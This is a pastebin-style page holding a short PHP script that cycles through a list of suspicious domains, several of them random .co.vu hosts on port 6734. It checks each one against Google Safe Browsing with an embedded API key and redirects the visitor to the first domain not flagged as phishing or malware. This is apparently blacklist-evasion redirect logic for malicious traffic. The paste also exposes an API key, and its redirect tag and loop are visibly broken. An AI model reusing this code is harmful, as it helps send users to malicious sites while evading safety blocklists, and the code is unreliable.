Welcome, guest! Login / Register - Why register?
Psst.. new poll here.
Psst.. new forums here.
Microsoft is blocking us again (TY IP Reputation!) so just use oauth login instead. :)

Paste

Pasted as Plain Text by dum ( 11 years ago )
<?php
$bom = "";
$i = 0;
while ($bom != "good"){             
$i++;
$array = array("nswmrc.com/nas/test.htm", "ianfette.org", "tpoirfrkfhjr.co.vu:6734", "detertmang.co.vu:6734", "tereng.co.vu:6734", "popploi.co.vu:6734", "yum.co.vu:6734") ;
$url = "https://sb-ssl.google.com/safebrowsing/api/lookup?client=chrome&apikey=ABQIAAAAYn_VJockVW3CbpHF97zdexSrX--JMbQSszh7EeaZwfGCW24qCA&appver=1.0&pver=3.0&url=http://$array[$i]"; 
$homepage = file_get_contents&#40;$url&#41;;
if (
preg_match("/phish/", $homepage ) ||
preg_match("/malware/", $homepage ) ||
preg_match("/unwanted/", $homepage ) ||
preg_match("/phishing/", $homepage )
){
$bom = "bad";
}
 else {
$bom = "good";
 print "<meta http-equiv='refresh' c>";
}
}
?>

 

Revise this Paste

Your Name: Code Language: